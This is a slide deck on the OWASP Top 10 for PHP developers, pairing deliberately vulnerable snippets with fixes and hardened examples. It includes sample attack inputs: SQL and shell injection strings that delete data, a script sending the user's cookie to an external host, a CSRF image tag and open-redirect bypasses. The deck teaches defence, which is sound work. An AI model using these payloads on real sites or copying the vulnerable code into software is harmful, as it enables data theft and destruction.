OWASP TOP 10 for PHP programmers
RICARDO MELO
Presented at #PHPLX – 11 September 2013
Follow this topic: @rjsmelo, #owasp, #php, #appsec
RICARDO MELO
● CTO @ DRI
● PHP, MySQL, Linux and lots of other OSS
● ZCE, RHCE, LPI 3, ITIL, etc.
● +10 years building (and breaking) things
About
● 14-year-old academic spin-off
● Pragmatic OSS orientation
● PHP, MySQL, SugarCRM, Drupal, JavaScript, Linux, etc.
● Crafters, integrators
● Always looking for software developers – yes, right now!
1999 - 2013 DRI. Some Rights Reserved.

Outline
● OWASP
● OWASP TOP 10
● What's Next
● Conclusions
What is OWASP?
● Open Web Application Security Project
● Worldwide not-for-profit
● Focus on security improvement and awareness
● Very active community
● Lots of projects (you can start yours)
What is the OWASP TOP 10?
● The full name is "The Top 10 Most Critical Web Application Security Risks"
● The focus is awareness
● Released 2003, 2004, 2007, 2010 and 2013
● https://www.owasp.org/index.php/Top_10_2013
Risk?
Each Top 10 entry is rated along these factors (the threat agent and the business impact are left application-specific):

    Threat Agent           Attack Vectors   Weakness Prevalence   Weakness Detectability   Technical Impacts   Business Impacts
    Application Specific   EASY             WIDESPREAD            EASY                     SEVERE              Application / Business Specific
                           AVERAGE          COMMON                AVERAGE                  MODERATE
                           DIFFICULT        UNCOMMON              DIFFICULT                MINOR
OWASP TOP 10 - 2013
● A1 – Injection
● A2 – Broken Authentication and Session Management
● A3 – Cross-Site Scripting (XSS)
● A4 – Insecure Direct Object References
● A5 – Security Misconfiguration
● A6 – Sensitive Data Exposure
● A7 – Missing Function Level Access Control
● A8 – Cross-Site Request Forgery (CSRF)
● A9 – Using Components with Known Vulnerabilities
● A10 – Unvalidated Redirects and Forwards
A1 – Injection
● Occurs when untrusted data is sent directly to an interpreter as part of a command or query!
● Not only SQL: NoSQL, LDAP, OS commands, XML, XPath!
● Never, NEVER trust ANY input!
A1 – Injection examples – SQL

Prone to SQL injection: the request parameter is concatenated straight into the query text.

    <?php
    // script.php?start_record=20
    $db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password');
    $stmt = $db->query(
        "SELECT * FROM some_table limit " . $_REQUEST['start_record'] . ",10");
    $result = $stmt->fetchAll(PDO::FETCH_ASSOC);
    echo function_to_render_result($result);
    // what if I set start_record = "1; delete from some_table; -- " ?

Fixed with a prepared statement. The LIMIT value has to be bound as an integer: with PDO's emulated prepares (the MySQL driver's default) a value passed to execute() is quoted as a string, and MySQL rejects "limit '20',10".

    <?php
    // script.php?start_record=20
    $db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password');
    $stmt = $db->prepare("SELECT * FROM some_table limit ?,10");
    $stmt->bindValue(1, (int) $_REQUEST['start_record'], PDO::PARAM_INT);
    $stmt->execute();
    $result = $stmt->fetchAll(PDO::FETCH_ASSOC);
    echo function_to_render_result($result);
A1 – Injection examples – OS commands

Prone to command injection: the file name is handed to the shell unquoted.

    <?php
    // script.php?file=xpto.pdf
    $fileType = exec("file " . $_REQUEST['file']);
    echo $fileType;
    // but one can try with "xpto.pdf; rm -fr /some/folder"

Fixed by quoting the argument for the shell:

    <?php
    // script.php?file=xpto.pdf
    $fileType = exec("file " . escapeshellarg($_REQUEST['file']));
    echo $fileType;

escapeshellarg() neutralises shell metacharacters, but it does not validate the value: a name starting with "-" is still parsed by file(1) as an option, and a path such as "../../etc/passwd" is still opened. Restrict the file name to what the application expects (e.g. basename() plus an allow-list of extensions), and escape $fileType before echoing it into HTML.
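Prepared statements cover values, but not every part of a query can be a parameter. As an added example (not code from the original slides), the repository below combines three things the A1 slides only touch on: bound parameters for data, an allow-list for identifiers such as the ORDER BY column, and an integer-typed bind for LIMIT/OFFSET. It runs stand-alone against an in-memory SQLite database; the products table, its rows and the class name are constructed for the example.

```php
<?php
// Added example, not from the original slides: parameters for data, an allow-list
// for the parts of a query that cannot be parameterised (identifiers), and an
// integer-typed bind for LIMIT/OFFSET. Runs stand-alone against an in-memory
// SQLite database; the products table and its rows are constructed here.

declare(strict_types=1);

final class ProductRepository
{
    // Column names cannot be bound as parameters, so sort keys are checked
    // against this fixed list before they are interpolated into the SQL.
    private const SORTABLE = ['name', 'price'];

    private PDO $db;

    public function __construct(PDO $db)
    {
        $this->db = $db;
    }

    /** @return array<int, array<string, mixed>> */
    public function search(string $term, string $sortBy, int $offset, int $limit): array
    {
        if (!in_array($sortBy, self::SORTABLE, true)) {
            throw new InvalidArgumentException("unsupported sort column: $sortBy");
        }

        // LIKE wildcards in the user's term are escaped so the input is matched
        // literally instead of becoming a pattern of the attacker's choosing.
        $pattern = '%' . addcslashes($term, '%_\\') . '%';

        $stmt = $this->db->prepare(
            "SELECT name, price FROM products WHERE name LIKE :term ESCAPE '\\' "
            . "ORDER BY $sortBy LIMIT :limit OFFSET :offset");
        $stmt->bindValue(':term', $pattern, PDO::PARAM_STR);
        // PARAM_INT matters: a string-bound value would be quoted, and
        // "LIMIT '10'" is a syntax error on MySQL with emulated prepares.
        $stmt->bindValue(':limit', max(0, $limit), PDO::PARAM_INT);
        $stmt->bindValue(':offset', max(0, $offset), PDO::PARAM_INT);
        $stmt->execute();
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    }
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE products (name TEXT NOT NULL, price INTEGER NOT NULL)');
$insert = $db->prepare('INSERT INTO products (name, price) VALUES (?, ?)');
foreach ([['widget', 10], ['gadget', 25], ['gizmo', 7]] as $row) {
    $insert->execute($row);
}

$repo = new ProductRepository($db);

// The textbook payload is just a search term now: it matches nothing.
$rows = $repo->search("' OR 1=1 --", 'name', 0, 10);
echo count($rows), " rows for the injection payload\n";

// A sort key that is not in the allow-list is refused before any SQL is built.
try {
    $repo->search('g', 'price; DROP TABLE products', 0, 10);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// Normal use: everything containing "g", cheapest first.
foreach ($repo->search('g', 'price', 0, 10) as $row) {
    echo $row['name'], ' ', $row['price'], "\n";
}
```

The allow-list check is the part most often forgotten: frameworks happily accept `ORDER BY $column` from a query string, and no amount of parameter binding helps there. The same pattern applies to table names, IN-list sizes and anything else that changes the query's shape rather than its values.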
A2 – Broken Authentication and Session Management
● Broken implementations allow an attacker to assume another user's identity!
● Can be session hijacking / fixation
● Broken authentication
● Or other failures that lead to compromised passwords / keys / session tokens
A2 – Session fixation

Prone to session fixation: a session ID the attacker planted in the victim's browser before login is still the session ID after login, so the attacker now holds a logged-in session.

    <?php
    // [ ... ]
    $userDetails = check_credentials($username, $password);
    if ($userDetails !== false) {
        $_SESSION['userIsLoggedin'] = true;
        $_SESSION['userInformation'] = $userDetails;
    }
    // [ ... ]

Fixed by issuing a fresh session ID at the moment privileges change:

    <?php
    // [ ... ]
    $userDetails = check_credentials($username, $password);
    if ($userDetails !== false) {
        // new ID; passing true also deletes the old session's data
        session_regenerate_id(true);
        $_SESSION['userIsLoggedin'] = true;
        $_SESSION['userInformation'] = $userDetails;
    }
    // [ ... ]
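The slide shows the one line that defeats fixation; the surrounding login code is where the other A2 failures (plaintext passwords, cookies readable by script, IDs accepted from the URL) usually live. The following is an added example, not code from the original slides: a complete login/logout pair with the session settings a PHP application should run with. check_credentials() is rewritten around password_hash()/password_verify(); the user store is a constructed array standing in for a database, and running it stand-alone needs a writable session.save_path.

```php
<?php
// Added example, not from the original slides: a login that hardens the session
// around the credential check. The user store is a constructed array standing in
// for a database; running this stand-alone needs a writable session.save_path.

declare(strict_types=1);

// Session settings, set before session_start() (better: in php.ini).
ini_set('session.use_strict_mode', '1');  // refuse session IDs the server never issued
ini_set('session.use_only_cookies', '1'); // never take the ID from the URL
ini_set('session.cookie_httponly', '1');  // not readable from document.cookie
ini_set('session.cookie_secure', '1');    // HTTPS only

// Constructed user store: only password_hash() output, never the password itself.
$users = [
    'alice' => password_hash('correct horse battery staple', PASSWORD_DEFAULT),
];
// Verified against when the username is unknown, so a miss costs the same time as a hit.
$dummyHash = password_hash('not-a-real-password', PASSWORD_DEFAULT);

function check_credentials(array $users, string $dummyHash, string $username, string $password): ?array
{
    $known = isset($users[$username]);
    $ok = password_verify($password, $known ? $users[$username] : $dummyHash);
    return ($known && $ok) ? ['username' => $username] : null;
}

function login(array $users, string $dummyHash, string $username, string $password): bool
{
    $details = check_credentials($users, $dummyHash, $username, $password);
    if ($details === null) {
        return false;
    }
    // Privilege change: replace the pre-login ID and delete the old session, so an
    // ID an attacker planted (fixation) or sniffed earlier is worthless from here on.
    session_regenerate_id(true);
    $_SESSION = ['userIsLoggedin' => true, 'userInformation' => $details];
    return true;
}

function logout(): void
{
    $_SESSION = [];
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', time() - 42000,
            $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    }
    session_destroy();
}

session_start();
$before = session_id();
var_dump(login($users, $dummyHash, 'alice', 'wrong password'));               // bool(false)
var_dump(login($users, $dummyHash, 'mallory', 'anything'));                   // bool(false)
var_dump(login($users, $dummyHash, 'alice', 'correct horse battery staple')); // bool(true)
var_dump(session_id() !== $before);                                           // bool(true): ID was regenerated
logout();
```

session.use_strict_mode is the setting that makes fixation hard in the first place: with it on, PHP refuses a cookie carrying an ID it never generated, so an attacker cannot pre-seed a session at all. Regeneration on login still matters for IDs obtained by other means (sniffing, logs, referrer leaks).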
A3 – Cross-Site Scripting (XSS)
● Whenever untrusted data is sent to the browser without proper validation and escaping!
● XSS lets the attacker run script in the victim's browser in the context of your site: read the page, send requests as the user, rewrite the UI... everything the page itself could do!
● Stored, reflected and DOM-based XSS
A3 – Steal the user's cookie

Prone to XSS: the search term is echoed back into the page unescaped.

    <?php
    // script.php?search=hello
    $results = some_search_function($_REQUEST['search']);
    ?>
    <html>
    <body>
    <p>results for : <?= $_REQUEST['search']; ?>
    <?= render_results($results); ?>
    </body>
    </html>

Set search to:

    <script>document.location='http://www.example.com/precious_cookie?cookie='+document.cookie</script>

Fixed by escaping for the HTML context on output:

    <?php
    // script.php?search=hello
    $results = some_search_function($_REQUEST['search']);
    ?>
    <html>
    <body>
    <p>results for : <?= htmlentities($_REQUEST['search'], ENT_COMPAT | ENT_HTML401, 'UTF-8'); ?>
    <?= render_results($results); ?>
    </body>
    </html>

Two caveats: ENT_COMPAT leaves single quotes alone, so use ENT_QUOTES as soon as the value can land inside a single-quoted attribute; and render_results() has to escape what it prints as well. Marking the session cookie HttpOnly stops this particular payload from reading it, but does nothing against the XSS itself.
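htmlentities() is the right tool for HTML text, and only for HTML text. The same search term also tends to be reflected into an attribute, into an inline script and into a link, and each of those needs its own encoding. The following is an added example, not code from the original slides: one escaping helper per output context, applied to the slide's payload. The helper names, render_search_page() and the markup are constructed for the example; it needs PHP 7.3+ for JSON_THROW_ON_ERROR.

```php
<?php
// Added example, not from the original slides: one escaping function per output
// context. The same untrusted string must be encoded differently depending on
// whether it lands in HTML text, in an attribute value, inside a <script> block
// or in a URL query string. Payload and markup are constructed for the example.

declare(strict_types=1);

function e_html(string $s): string
{
    // ENT_QUOTES encodes both ' and ", so the result is safe in text and inside
    // quoted attributes; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
    // returning an empty string (which would silently drop the output).
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

function e_attr(string $s): string
{
    // Same encoding, but only ever use the result inside a *quoted* attribute.
    return e_html($s);
}

function e_js($value): string
{
    // json_encode() yields a valid JS literal; the HEX flags encode < > & ' "
    // so "</script>" inside the value cannot close the surrounding script block.
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

function e_url(string $s): string
{
    // For a single query-string component, not for a whole URL.
    return rawurlencode($s);
}

function render_search_page(string $search): string
{
    return '<p>results for : ' . e_html($search) . "</p>\n"
         . '<input type="text" name="search" value="' . e_attr($search) . "\">\n"
         . '<script>var lastSearch = ' . e_js($search) . ";</script>\n"
         . '<a href="/search?search=' . e_url($search) . "\">search again</a>\n";
}

// The slide's cookie-stealing payload, rendered into all four contexts.
$payload = "<script>document.location='http://www.example.com/precious_cookie?cookie='+document.cookie</script>";
echo render_search_page($payload);
```

The output contains no raw `<`, `'` or `"` from the payload in any of the four places: `&lt;script&gt;...` in the text and attribute, `"\u003Cscript\u003E..."` inside the script block and `%3Cscript%3E...` in the link. What the helpers cannot do is make an unquoted attribute or a `javascript:` URL safe; those contexts need an allow-list (see A10 for the URL case), not an encoder.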
A4 – Insecure Direct Object References
● Whenever the developer exposes a reference to an internal object (a database key, a file name) without proper access control.
● Attackers change the reference and access resources that shouldn't be accessible to them.
A4 – Access another user's account

Prone to insecure direct object reference: any logged-in user can read any account ID.

    <?php
    // script.php?account=10
    $accountId = intval($_REQUEST['account']);
    $account = new Account($accountId);
    echo render_account_info($account);
    // and if I change account to "9"?

Fixed by checking that the current user may read that account:

    <?php
    // script.php?account=10
    $user = new User($_SESSION['userInfo']);
    $accountId = intval($_REQUEST['account']);
    $account = new Account($accountId);
    if ($account->canRead($user)) {
        echo render_account_info($account);
    } else {
        echo "Access denied";
    }
A5 – Security Misconfiguration
● Failing to secure the full stack often leads to the application / servers being compromised.
● Take into consideration other services / applications running on the same infrastructure
● Watch out for outdated software
● Watch out for default accounts
● In PHP: display_errors=Off and expose_php=Off in production, and no stray phpinfo() pages
A6 – Sensitive Data Exposure
● Whenever sensitive data isn't properly protected, allowing attackers to steal or modify that information.
● Credit card fraud, identity theft, etc.!
● Data must be protected both in transit and at rest (don't forget the backups)
● Passwords are never stored in clear: password_hash() / password_verify() (PHP 5.5+)
A7 – Missing Function Level Access Control
● Most applications check function-level access before showing the option in the UI, but fail to check again when the function is actually requested.
● An attacker can forge requests to functions that shouldn't be available to them.
A7 – Insecure function

Prone to insecure function access: the action is dispatched without asking who is calling.

    <?php
    // script.php?user=john&action=read
    $userId = $_REQUEST['user'];
    $action = $_REQUEST['action'];
    $user = new User($userId);
    switch ($action) {
        case 'read':
            echo render_user($user);
            break;
        case 'delete':
            $user->delete();
            echo "user Deleted";
            break;
    }
    // and if I change action to "delete"?

Fixed by checking the logged-in user's permission for each action:

    <?php
    $userId = $_REQUEST['user'];
    $action = $_REQUEST['action'];
    $loggedUser = new AppUser($_SESSION['userInfo']);
    $user = new User($userId);
    switch ($action) {
        case 'read':
            if ($user->canRead($loggedUser)) {
                echo render_user($user);
            }
            break;
        case 'delete':
            if ($user->canDelete($loggedUser)) {
                $user->delete();
                echo "user Deleted";
            }
            break;
    }
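A4 and A7 are two faces of the same missing check, and the canRead()/canDelete() calls on the slides leave open where those decisions are made. The following is an added example, not code from the original slides, serving both the A4 and the A7 slides: authorisation lives in one deny-by-default rule table, and object lookups are scoped to the caller in the query itself, so a tampered ID is simply "not found" rather than a load-then-check. The Authz and AccountRepository classes, the accounts table, its rows and the actors are constructed for the example; it runs stand-alone on an in-memory SQLite database.

```php
<?php
// Added example, not from the original slides, covering the A4 and A7 slides
// together: object lookups are scoped to the caller, and every action is checked
// server-side against a deny-by-default rule table. The accounts table, its rows
// and the actors are constructed here in an in-memory SQLite database.

declare(strict_types=1);

final class Authz
{
    // action => roles allowed to perform it; anything not listed is denied.
    private const RULES = [
        'account.read'   => ['user', 'admin'],
        'account.delete' => ['admin'],
    ];

    public static function can(array $actor, string $action): bool
    {
        return in_array($actor['role'], self::RULES[$action] ?? [], true);
    }
}

final class AccountRepository
{
    private PDO $db;

    public function __construct(PDO $db)
    {
        $this->db = $db;
    }

    // A4: the owner is part of the WHERE clause, so a guessed or tampered account
    // ID that belongs to someone else simply does not exist for this caller.
    public function findForOwner(int $accountId, int $ownerId): ?array
    {
        $stmt = $this->db->prepare(
            'SELECT id, owner_id, balance FROM accounts WHERE id = :id AND owner_id = :owner');
        $stmt->bindValue(':id', $accountId, PDO::PARAM_INT);
        $stmt->bindValue(':owner', $ownerId, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    }

    public function delete(int $accountId): void
    {
        $stmt = $this->db->prepare('DELETE FROM accounts WHERE id = :id');
        $stmt->bindValue(':id', $accountId, PDO::PARAM_INT);
        $stmt->execute();
    }
}

// A7: the handler checks the action itself, regardless of what the UI offered.
// $action and $accountId are whatever the request carried (constructed below).
function handle(array $actor, string $action, int $accountId, AccountRepository $repo): string
{
    switch ($action) {
        case 'read':
            if (!Authz::can($actor, 'account.read')) {
                return 'Access denied';
            }
            $account = $repo->findForOwner($accountId, $actor['id']);
            return $account === null ? 'Not found' : 'balance=' . $account['balance'];
        case 'delete':
            if (!Authz::can($actor, 'account.delete')) {
                return 'Access denied';
            }
            $repo->delete($accountId);
            return 'account deleted';
        default:
            return 'Unknown action';
    }
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE accounts (id INTEGER PRIMARY KEY, owner_id INTEGER NOT NULL, balance INTEGER NOT NULL)');
$db->exec('INSERT INTO accounts (id, owner_id, balance) VALUES (9, 1, 500), (10, 2, 42)');
$repo = new AccountRepository($db);

$bob   = ['id' => 2, 'role' => 'user'];
$admin = ['id' => 1, 'role' => 'admin'];
echo handle($bob, 'read', 10, $repo), "\n";     // balance=42    (Bob's own account)
echo handle($bob, 'read', 9, $repo), "\n";      // Not found     (account=9 is not Bob's)
echo handle($bob, 'delete', 10, $repo), "\n";   // Access denied (forged action=delete)
echo handle($admin, 'delete', 10, $repo), "\n"; // account deleted
```

Answering "Not found" rather than "Access denied" for someone else's account ID is deliberate: it does not confirm that the ID exists, which is the first thing an attacker enumerating IDs wants to learn.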
A8 – Cross-Site Request Forgery (CSRF)
● CSRF forces a victim's browser to send a forged HTTP request to a vulnerable web application (normally riding on an existing user session: the browser attaches the session cookie by itself)
● To the server, it looks no different from a user-generated request!
A8 – Delete user

Vulnerable app: the access check passes, because the victim really is logged in; it is the victim's intent that is missing.

    <?php
    // delete.php?id=123
    $id = intval($_REQUEST['id']);
    $user = new User($id);
    $loggedUser = new AppUser($_SESSION['userInfo']);
    if ($user->canDelete($loggedUser)) {
        $user->delete();
    }
    ?>

Attacker's site:

    <img src="http://www.example.com/users/delete.php?id=123" />

Fixed with a per-session secret token that the attacker's page cannot read or guess:

    <?php
    $id = intval($_REQUEST['id']);
    $user = new User($id);
    $loggedUser = new AppUser($_SESSION['userInfo']);
    if (validate_token($_REQUEST['token'])) {
        if ($user->canDelete($loggedUser)) {
            $user->delete();
        }
    }

State-changing actions should also be accepted over POST only; a GET reachable through an <img> tag is what made this attack a one-liner.
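The slide leaves validate_token() undefined. The following is an added example, not code from the original slides: the token's issuing side, its validation with a constant-time compare, and a delete handler that also refuses anything but POST. The function names, the $server/$post arrays and the callback are constructed so the three request shapes can be exercised without a web server; it needs PHP 7+ for random_bytes().

```php
<?php
// Added example, not from the original slides: the validate_token() the slide
// leaves undefined, together with its counterpart that issues the token and a
// handler that uses them. $_SESSION is populated directly so that this runs
// stand-alone; in the application session_start() does that.

declare(strict_types=1);

function csrf_token(): string
{
    // One unguessable token per session, created on first use.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string
{
    // Hidden field for forms; the value is escaped like any attribute value.
    return '<input type="hidden" name="token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function validate_token(?string $submitted): bool
{
    if ($submitted === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    // hash_equals() runs in constant time, so a wrong token is not rejected
    // faster or slower depending on how many leading bytes happen to match.
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// State-changing handler: only POST, and only with a valid token. A cross-site
// <img src=...> or a plain link can do neither; a cross-site form can POST but
// cannot read the victim's token.
function delete_user_request(array $server, array $post, callable $doDelete): string
{
    if (($server['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return '405 Method Not Allowed';
    }
    if (!validate_token($post['token'] ?? null)) {
        return '403 Forbidden: bad CSRF token';
    }
    $doDelete((int) ($post['id'] ?? 0));
    return '200 OK';
}

$_SESSION = [];   // stand-in for session_start() in this stand-alone run
$deleted = [];
$doDelete = function (int $id) use (&$deleted): void {
    $deleted[] = $id;   // the real handler would call $user->delete() after canDelete()
};

// The slide's <img> attack: a GET with no token.
echo delete_user_request(['REQUEST_METHOD' => 'GET'], ['id' => '123'], $doDelete), "\n";
// A cross-site form: POST, but the token is a guess.
echo delete_user_request(['REQUEST_METHOD' => 'POST'], ['id' => '123', 'token' => 'guess'], $doDelete), "\n";
// The application's own form, which embedded csrf_field().
echo delete_user_request(['REQUEST_METHOD' => 'POST'], ['id' => '123', 'token' => csrf_token()], $doDelete), "\n";
var_dump($deleted);   // array(1) { [0]=> int(123) }
```

The token check must come before anything with a side effect, and the token must never be put in a URL (it would leak through Referer headers and logs). From PHP 7.3 on, session.cookie_samesite adds a second, browser-enforced layer, but it does not replace the token.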
A9 – Using Components with Known Vulnerabilities
● Whenever you use libraries, frameworks or other software modules with known vulnerabilities.
● Attackers can leverage these issues to attack your application / server / etc.
● Keep an inventory of what you ship (the Composer lock file is a start) and check it against published advisories; Composer 2.4+ does this with `composer audit`
A10 – Unvalidated Redirects and Forwards
● Web applications often redirect users to other pages, using untrusted data to determine the destination page.
● Attackers can redirect victims to phishing or malware pages, or use forwards to reach pages they are not authorised for.
A10 – "Simple" forward

Prone to unauthorised forwarding: the callback name comes straight from the request, and method_exists() only checks that the method exists, not that this caller may run it. callback=destroyAction reaches destroyAction() without its access check (preFunction()) ever running.

    <?php
    class someController extends baseController {
        public function preFunction($args, $action) {
            $this->checkAccess($args, $action);
        }

        public function indexAction($args) {
            // [...] do something here
            if (isset($args['callback']) && method_exists($this, $args['callback'])) {
                $callback = $args['callback'];
                unset($args['callback']);
                call_user_func_array(array($this, $callback), $args);
            }
            return $response;
        }

        public function destroyAction($args) {
            $this->selfTerminate();
        }
    }

Fixed by running the same access check a direct request would get before forwarding:

    <?php
    if (isset($args['callback']) && method_exists($this, $args['callback'])) {
        $callback = $args['callback'];
        $this->preFunction($args, $callback);
        unset($args['callback']);
        call_user_func_array(array($this, $callback), $args);
    }

Better still, forward only to names on a fixed allow-list rather than to any method the controller happens to have.
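The redirect half of A10 is the more common one in practice: a "next" or "return_to" parameter handed to header('Location: ...'). The following is an added example, not code from the original slides: a validator that accepts only a local path and falls back to a fixed default for everything else, exercised against the usual bypass shapes. The function name and the test URLs are constructed for the example.

```php
<?php
// Added example, not from the original slides: validating a user-supplied
// redirect target. Only a local path is accepted; everything else falls back to
// a fixed default. The test URLs are constructed for the example.

declare(strict_types=1);

function safe_redirect_target(?string $target, string $default = '/'): string
{
    if ($target === null || $target === '') {
        return $default;
    }
    // Exactly one leading slash: "//host/..." (protocol-relative), "/\host" (some
    // browsers treat the backslash as a slash) and "http://host" all leave the site.
    if ($target[0] !== '/' || (strlen($target) > 1 && ($target[1] === '/' || $target[1] === '\\'))) {
        return $default;
    }
    // CR/LF would split the Location header; other control characters have no business here.
    if (preg_match('/[\x00-\x1f\x7f]/', $target)) {
        return $default;
    }
    // Belt and braces: after the checks above parse_url() must see neither a scheme nor a host.
    $parts = parse_url($target);
    if ($parts === false || isset($parts['scheme']) || isset($parts['host'])) {
        return $default;
    }
    return $target;
}

// Constructed cases: input => expected result.
$cases = [
    '/account/settings'         => '/account/settings',
    '/search?q=php#top'         => '/search?q=php#top',
    'http://evil.example/phish' => '/',
    '//evil.example/phish'      => '/',
    '/\\evil.example'           => '/',
    'javascript:alert(1)'       => '/',
    "/x\r\nSet-Cookie: a=b"     => '/',
    ''                          => '/',
];
foreach ($cases as $in => $want) {
    $got = safe_redirect_target($in);
    printf("%-32s -> %-20s %s\n", var_export($in, true), $got, $got === $want ? 'ok' : 'FAIL');
}

// In the application:
// header('Location: ' . safe_redirect_target($_GET['next'] ?? null));
// exit;
```

If the application genuinely needs to send users to other hosts, compare the parsed host against an explicit allow-list of domains instead of relaxing the path-only rule; pattern matching on the string ("starts with https://www.example.com") is exactly what "https://www.example.com.evil.example" is built to pass.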
What's Next for PHP Programmers
● OWASP – http://goo.gl/lVRRY
● Cheat Sheets – http://goo.gl/lVRRY
● OWASP Zed Attack Proxy – http://goo.gl/QE5v1H
● OWASP Books – free – http://goo.gl/aLx1q2
Conclusions
● Keeping the application secure is a continuous process
● Avoiding the Top 10 risks doesn't make your application secure, but it is already a HUGE step forward.
● Don't trust ANY input! Escape every output!
Thank you
Follow this topic: @rjsmelo, #owasp, #php, #appsec
QA Feedback: https://joind.in/9107
www.dri-global.com @rjsmelo ricardo.melo@dri-global.com